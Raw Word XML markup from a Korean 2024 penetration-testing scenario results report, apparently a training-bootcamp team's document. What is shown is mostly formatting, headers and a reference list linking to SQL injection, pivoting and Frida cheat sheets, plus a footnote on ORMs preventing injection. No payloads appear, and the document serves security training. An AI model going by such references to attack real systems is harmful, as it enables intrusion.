          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="240"/>
        <w:ind w:left="760"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00026FB0" w:rsidRPr="006F20B7" w:rsidRDefault="00026FB0" w:rsidP="00E94242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b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F20B7">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SQL인젝션</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00711024" w:rsidRDefault="00EF4193" w:rsidP="00711024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hyperlink r:id="rId65" w:history="1">
        <w:r w:rsidR="00711024" w:rsidRPr="00B800C1">
          <w:rPr>
            <w:rStyle w:val="ac"/>
            <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://alomancy.gitbook.io/guides/cheat-sheets/tunnelling-pivoting-and-proxies</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="006F20B7" w:rsidRPr="006F20B7" w:rsidRDefault="00EF4193" w:rsidP="006F20B7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hyperlink r:id="rId66" w:history="1">
        <w:r w:rsidR="006F20B7" w:rsidRPr="00B800C1">
          <w:rPr>
            <w:rStyle w:val="ac"/>
            <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00711024" w:rsidRPr="00711024" w:rsidRDefault="00711024" w:rsidP="0071102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Style w:val="ac"/>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00344CC8" w:rsidRPr="006F20B7" w:rsidRDefault="00344CC8" w:rsidP="00344CC8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b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F20B7">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>프리다</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00711024" w:rsidRPr="00711024" w:rsidRDefault="00EF4193" w:rsidP="00711024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hyperlink r:id="rId67" w:history="1">
        <w:r w:rsidR="00344CC8" w:rsidRPr="00B800C1">
          <w:rPr>
            <w:rStyle w:val="ac"/>
            <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://frida.re/docs/examples/android/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00711024" w:rsidRPr="00711024" w:rsidRDefault="00711024" w:rsidP="00711024">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="240"/>
        <w:ind w:left="1200"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00711024" w:rsidRPr="00711024">
      <w:headerReference w:type="default" r:id="rId68"/>
      <w:footerReference w:type="default" r:id="rId69"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="2127" w:right="1134" w:bottom="567" w:left="1134" w:header="851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93" w:rsidRDefault="00EF4193">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00EF4193" w:rsidRDefault="00E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6F" w:rsidRDefault="00610E6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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
        <w:color w:val="000000"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:tbl>
    <w:tblPr>
      <w:tblStyle w:val="affffffffffff9"/>
      <w:tblW w:w="965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6245"/>
      <w:gridCol w:w="842"/>
      <w:gridCol w:w="20"/>
    </w:tblGrid>
    <w:tr w:rsidR="00610E6F">
      <w:trPr>
        <w:trHeight w:val="70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:rsidR="00610E6F" w:rsidRDefault="00610E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:rsidR="00610E6F" w:rsidRDefault="00610E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8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10E6F" w:rsidRDefault="00610E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2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10E6F" w:rsidRDefault="00610E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</w:tr>
    <w:tr w:rsidR="00610E6F">
      <w:trPr>
        <w:jc w:val="center"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="2552" w:type="dxa"/>
          <w:vMerge/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w:rsidR="00610E6F" w:rsidRDefault="00610E6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:rsidR="00610E6F" w:rsidRDefault="00610E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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
              <w:color w:val="000000"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="842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610E6F" w:rsidRDefault="00610E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color w:val="000000"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pP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begin"/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instrText>PAGE</w:instrText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separate"/>
          </w:r>
          <w:r w:rsidR="00DB3E07">
            <w:rPr>
              <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
              <w:noProof/>
              <w:color w:val="000000"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>20</w:t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end"/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t xml:space="preserve"> / </w:t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begin"/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instrText>NUMPAGES</w:instrText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separate"/>
          </w:r>
          <w:r w:rsidR="00DB3E07">
            <w:rPr>
              <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
              <w:noProof/>
              <w:color w:val="000000"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>20</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
              <w:color w:val="000000"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="2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610E6F" w:rsidRDefault="00610E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Cs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="00610E6F" w:rsidRDefault="00610E6F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93" w:rsidRDefault="00EF4193">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00EF4193" w:rsidRDefault="00EF4193">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="1">
    <w:p w:rsidR="00610E6F" w:rsidRPr="00A82FB4" w:rsidRDefault="00610E6F">
      <w:pPr>
        <w:pStyle w:val="af"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af0"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ORM : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">데이터베이스를 추상화하고 </w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">쿼리를 안전하게 구상하여 </w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>주입을 방지하는데 도움을 준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000000"/>
        <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
        <w:bottom w:val="single" w:sz="18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1"/>
      <w:gridCol w:w="5949"/>
      <w:gridCol w:w="1984"/>
    </w:tblGrid>
    <w:tr w:rsidR="00610E6F" w:rsidTr="00610E6F">
      <w:trPr>
        <w:trHeight w:val="369"/>
        <w:jc w:val="center"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1701" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w:rsidR="00610E6F" w:rsidRDefault="00610E6F" w:rsidP="00C128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Cs w:val="20"/>
            </w:rPr>
            <w:t>보안등급</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="5949" w:type="dxa"/>
          <w:vMerge w:val="restart"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w:rsidR="00610E6F" w:rsidRDefault="00610E6F" w:rsidP="00C128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 w:val="22"/>
              <w:szCs w:val="22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 w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve">2024년 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕" w:hint="eastAsia"/>
              <w:b/>
              <w:color w:val="000000"/>
              <w:sz w:val="24"/>
            </w:rPr>
            <w:t>모의해킹 시나리오</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
              <w:b/>
              <w:color w:val="000000"/>
              <w:sz w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> 결과보고서</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1984" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w:rsidR="00610E6F" w:rsidRDefault="00610E6F" w:rsidP="00C128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r>
            <w:rPr>
              <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕" w:hint="eastAsia"/>
              <w:b/>
              <w:color w:val="000000"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>한끗차이</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
    <w:tr w:rsidR="00610E6F" w:rsidTr="00610E6F">
      <w:trPr>
        <w:trHeight w:val="369"/>
        <w:jc w:val="center"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1701" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w:rsidR="00610E6F" w:rsidRDefault="00610E6F" w:rsidP="00C128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Cs w:val="20"/>
            </w:rPr>
            <w:t>Confidential</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="5949" w:type="dxa"/>
          <w:vMerge/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w:rsidR="00610E6F" w:rsidRDefault="00610E6F" w:rsidP="00C1285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</w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1984" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w:rsidR="00610E6F" w:rsidRDefault="00610E6F" w:rsidP="00F21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Cs w:val="20"/>
            </w:rPr>
            <w:t>2024.07.29</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="00610E6F" w:rsidRDefault="00610E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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕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BE" w:rsidRDefault="008053BE">
    <w:pPr>
      <w:pStyle w:val="a4"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EB61B76" wp14:editId="1B484474">
          <wp:extent cx="1938633" cy="762000"/>
          <wp:effectExtent l="0" t="0" r="5080" b="0"/>
          <wp:docPr id="68" name="그림 68" descr="SK쉴더스 루키즈 - 부트캠프 코리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쉴더스 루키즈 - 부트캠프 코리아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30" b="29565"/>
                  <a:stretch/>
                </pic:blipFill>
                <pic:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="1974783" cy="776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6F" w:rsidRDefault="00610E6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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
        <w:color w:val="000000"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:tbl>
    <w:tblPr>
      <w:tblStyle w:val="affffffffffff8"/>
      <w:tblW w:w="963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18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1"/>
      <w:gridCol w:w="5949"/>
      <w:gridCol w:w="1984"/>
    </w:tblGrid>
    <w:tr w:rsidR="00610E6F">
      <w:trPr>
        <w:trHeight w:val="369"/>
        <w:jc w:val="center"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1701" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w:rsidR="00610E6F" w:rsidRDefault="00610E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Cs w:val="20"/>
            </w:rPr>
            <w:t>보안등급</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="5949" w:type="dxa"/>
          <w:vMerge w:val="restart"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w:rsidR="00610E6F" w:rsidRDefault="00610E6F" w:rsidP="002A2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 w:val="22"/>
              <w:szCs w:val="22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 w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve">2024년 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕" w:hint="eastAsia"/>
              <w:b/>
              <w:color w:val="000000"/>
              <w:sz w:val="24"/>
            </w:rPr>
            <w:t>모의해킹 시나리오</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
              <w:b/>
              <w:color w:val="000000"/>
              <w:sz w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> 결과보고서</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1984" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w:rsidR="00610E6F" w:rsidRDefault="00610E6F" w:rsidP="002A2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r>
            <w:rPr>
              <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕" w:hint="eastAsia"/>
              <w:b/>
              <w:color w:val="000000"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>한끗차이</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
    <w:tr w:rsidR="00610E6F">
      <w:trPr>
        <w:trHeight w:val="369"/>
        <w:jc w:val="center"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1701" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w:rsidR="00610E6F" w:rsidRDefault="00610E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Cs w:val="20"/>
            </w:rPr>
            <w:t>Confidential</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="5949" w:type="dxa"/>
          <w:vMerge/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w:rsidR="00610E6F" w:rsidRDefault="00610E6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</w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1984" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w:rsidR="00610E6F" w:rsidRDefault="00C223A0" w:rsidP="002A2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Cs w:val="20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Cs w:val="20"/>
            </w:rPr>
            <w:t>2024.07.</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕" w:hint="eastAsia"/>
              <w:b/>
              <w:color w:val="000000"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>31</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="00610E6F" w:rsidRDefault="00610E6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6F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EBFE0C0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6E6D24"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A0964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8" w:hanging="2160"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="089624F2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4712FB94"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Level3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286C04"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5DD2A5F8"/>
    <w:lvl w:ilvl="0" w:tplc="961892DA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ADA0439"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DC9E1F8E"/>
    <w:lvl w:ilvl="0" w:tplc="2A08CD56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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0B5C0C03"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="07661090"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="-"/>
      <w:lvlText w:val="1-%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="16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0171C3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B1800110"/>
    <w:lvl w:ilvl="0" w:tplc="961892DA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277D3344"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CC7EAB7C"/>
    <w:lvl w:ilvl="0" w:tplc="961892DA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1560" w:hanging="400"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="961892D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0E394D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="227A0690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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4E8F082F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9202E93E"/>
    <w:lvl w:ilvl="0" w:tplc="3606DF72">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="2"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:hanging="400"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:eastAsia="맑은 고딕" w:hint="eastAsia"/>
        <w:b/>
        <w:i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A51E13"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AE209A2C"/>
    <w:lvl w:ilvl="0" w:tplc="310AD346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961892D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BA4D32"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7F5EA9BC"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="10"/>
      <w:lvlText w:val="•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Level2TitleCtl2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pStyle w:val="Level3TitleCtl3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D00D1F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF0CBE72"/>
    <w:lvl w:ilvl="0" w:tplc="42FE7B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F85104"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8206833C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="20"/>
      <w:lvlText w:val="%1. "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:sz w:val="28"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="3"/>
      <w:lvlText w:val="%1.%2. "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2978" w:hanging="567"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="(%3)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="567" w:hanging="567"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:i w:val="0"/>
        <w:sz w:val="24"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4. "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1984" w:hanging="70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DF09BF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1F64C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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="79075023"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E61EBF6A"/>
    <w:lvl w:ilvl="0" w:tplc="961892DA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6"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="8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96"/>
    <w:rsid w:val="00001828"/>
    <w:rsid w:val="00003B0F"/>
    <w:rsid w:val="00012297"/>
    <w:rsid w:val="00015769"/>
    <w:rsid w:val="00026FB0"/>
    <w:rsid w:val="00042ACD"/>
    <w:rsid w:val="000433C6"/>
    <w:rsid w:val="000603C4"/>
    <w:rsid w:val="000777E6"/>
    <w:rsid w:val="00080DFB"/>
    <w:rsid w:val="00081CEA"/>
    <w:rsid w:val="000B5D54"/>
    <w:rsid w:val="000C1535"/>
    <w:rsid w:val="000C65BD"/>
    <w:rsid w:val="000D0FF0"/>
    <w:rsid w:val="000D6DCC"/>
    <w:rsid w:val="000E593B"/>
    <w:rsid w:val="00103B7B"/>
    <w:rsid w:val="0011608D"/>
    <w:rsid w:val="00122600"/>
    <w:rsid w:val="00144F46"/>
    <w:rsid w:val="00157B80"/>
    <w:rsid w:val="001639E3"/>
    <w:rsid w:val="00163F08"/>
    <w:rsid w:val="00166EE4"/>
    <w:rsid w:val="001672CA"/>
    <w:rsid w:val="00176F06"/>
    <w:rsid w:val="0018097E"/>
    <w:rsid w:val="001825CB"/>
    <w:rsid w:val="00190934"/>
    <w:rsid w:val="001A44DC"/>
    <w:rsid w:val="001B1723"/>
    <w:rsid w:val="001B5FBC"/>
    <w:rsid w:val="001D1255"/>
    <w:rsid w:val="001D1BF6"/>
    <w:rsid w:val="001E2F95"/>
    <w:rsid w:val="001F66FE"/>
    <w:rsid w:val="001F732D"/>
    <w:rsid w:val="00205C1E"/>
    <w:rsid w:val="002109F2"/>
    <w:rsid w:val="00223B00"/>
    <w:rsid w:val="002253A8"/>
    <w:rsid w:val="00247947"/>
    <w:rsid w:val="00250E12"/>
    <w:rsid w:val="00260F17"/>
    <w:rsid w:val="0027016C"/>
    <w:rsid w:val="002836E5"/>
    <w:rsid w:val="0029318C"/>
    <w:rsid w:val="002A1397"/>
    <w:rsid w:val="002A2F1E"/>
    <w:rsid w:val="002C682B"/>
    <w:rsid w:val="002D53B6"/>
    <w:rsid w:val="002E28B5"/>
    <w:rsid w:val="00314A6D"/>
    <w:rsid w:val="00344CC8"/>
    <w:rsid w:val="0035144D"/>
    <w:rsid w:val="00353EB1"/>
    <w:rsid w:val="003754AB"/>
    <w:rsid w:val="00380AAA"/>
    <w:rsid w:val="003906D3"/>
    <w:rsid w:val="00394BC9"/>
    <w:rsid w:val="003A6296"/>
    <w:rsid w:val="003B0EA7"/>
    <w:rsid w:val="003B4A0E"/>
    <w:rsid w:val="003C2FC3"/>
    <w:rsid w:val="003D0E0E"/>
    <w:rsid w:val="003E2410"/>
    <w:rsid w:val="003F625D"/>
    <w:rsid w:val="004237BA"/>
    <w:rsid w:val="004257BD"/>
    <w:rsid w:val="00451626"/>
    <w:rsid w:val="004604FE"/>
    <w:rsid w:val="00460E5B"/>
    <w:rsid w:val="00463832"/>
    <w:rsid w:val="00485BFC"/>
    <w:rsid w:val="004A1656"/>
    <w:rsid w:val="004C2629"/>
    <w:rsid w:val="004C2FBC"/>
    <w:rsid w:val="004E1A18"/>
    <w:rsid w:val="004E7189"/>
    <w:rsid w:val="004F48B6"/>
    <w:rsid w:val="00505CA4"/>
    <w:rsid w:val="0051192E"/>
    <w:rsid w:val="0051326B"/>
    <w:rsid w:val="0051477A"/>
    <w:rsid w:val="00522299"/>
    <w:rsid w:val="0053537E"/>
    <w:rsid w:val="00557591"/>
    <w:rsid w:val="005618B8"/>
    <w:rsid w:val="005802C4"/>
    <w:rsid w:val="005A4290"/>
    <w:rsid w:val="005B3458"/>
    <w:rsid w:val="005C0877"/>
    <w:rsid w:val="005D7067"/>
    <w:rsid w:val="005E270D"/>
    <w:rsid w:val="00601D44"/>
    <w:rsid w:val="00602A7D"/>
    <w:rsid w:val="006041C6"/>
    <w:rsid w:val="00610E6F"/>
    <w:rsid w:val="00611CDD"/>
    <w:rsid w:val="006155BA"/>
    <w:rsid w:val="0062296E"/>
    <w:rsid w:val="006436D7"/>
    <w:rsid w:val="00643AC8"/>
    <w:rsid w:val="00643CA3"/>
    <w:rsid w:val="00652F63"/>
    <w:rsid w:val="00660F0A"/>
    <w:rsid w:val="00667E98"/>
    <w:rsid w:val="006717D6"/>
    <w:rsid w:val="0067728E"/>
    <w:rsid w:val="0069004F"/>
    <w:rsid w:val="006A254B"/>
    <w:rsid w:val="006B5FEF"/>
    <w:rsid w:val="006B7B8F"/>
    <w:rsid w:val="006C0B8A"/>
    <w:rsid w:val="006C1BB5"/>
    <w:rsid w:val="006D078A"/>
    <w:rsid w:val="006D39A2"/>
    <w:rsid w:val="006D5523"/>
    <w:rsid w:val="006F20B7"/>
    <w:rsid w:val="007029B9"/>
    <w:rsid w:val="00702AE8"/>
    <w:rsid w:val="00703062"/>
    <w:rsid w:val="00711024"/>
    <w:rsid w:val="00722E55"/>
    <w:rsid w:val="00725203"/>
    <w:rsid w:val="00735B66"/>
    <w:rsid w:val="00735ED0"/>
    <w:rsid w:val="00741926"/>
    <w:rsid w:val="00746BAB"/>
    <w:rsid w:val="007564D6"/>
    <w:rsid w:val="007867A8"/>
    <w:rsid w:val="007A5EB3"/>
    <w:rsid w:val="007B0553"/>
    <w:rsid w:val="007D7D6F"/>
    <w:rsid w:val="007E3234"/>
    <w:rsid w:val="007E3A38"/>
    <w:rsid w:val="007F3827"/>
    <w:rsid w:val="008053BE"/>
    <w:rsid w:val="0082532B"/>
    <w:rsid w:val="0084134B"/>
    <w:rsid w:val="00845269"/>
    <w:rsid w:val="00872391"/>
    <w:rsid w:val="008C04D8"/>
    <w:rsid w:val="008C0A0B"/>
    <w:rsid w:val="008F2475"/>
    <w:rsid w:val="008F4570"/>
    <w:rsid w:val="008F4CF8"/>
    <w:rsid w:val="009413C5"/>
    <w:rsid w:val="00960BD1"/>
    <w:rsid w:val="00976691"/>
    <w:rsid w:val="00985928"/>
    <w:rsid w:val="009A63AD"/>
    <w:rsid w:val="009B2101"/>
